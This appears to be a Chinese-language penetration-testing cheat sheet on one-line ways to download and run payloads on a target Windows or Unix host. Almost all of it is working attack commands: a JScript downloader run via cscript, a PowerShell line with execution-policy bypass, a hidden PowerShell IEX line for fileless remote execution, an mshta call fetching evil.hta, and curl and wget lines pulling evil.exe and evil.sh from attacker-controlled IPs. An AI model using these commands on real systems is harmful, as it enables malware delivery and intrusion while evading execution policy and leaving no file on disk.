js一句话下载payload
windows 全版本都会默认支持 js,并且通过cscript 来调用达到下载 payload 的目的。

1
2
3
4
5
6
7
8
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();

BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;

BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("micropoor.exe");
1
C:\test>cscript /nologo dowfile2.js http://192.168.1.1/eval.exe

还有最简单的powershell

1
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')

远程执行命令,且无文件落地:

1
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.1:1234/evil.txt'))"

远程目标主机上执行以下命令实现下载执行操作,且无文件落地:

1
mshta http://192.168.174.1:1234/evil.hta

curl

1
curl http://192.168.174.1:1234/evil.exe -o evil.exe

wget

1
wget http://192.168.174.1:1234/evil.sh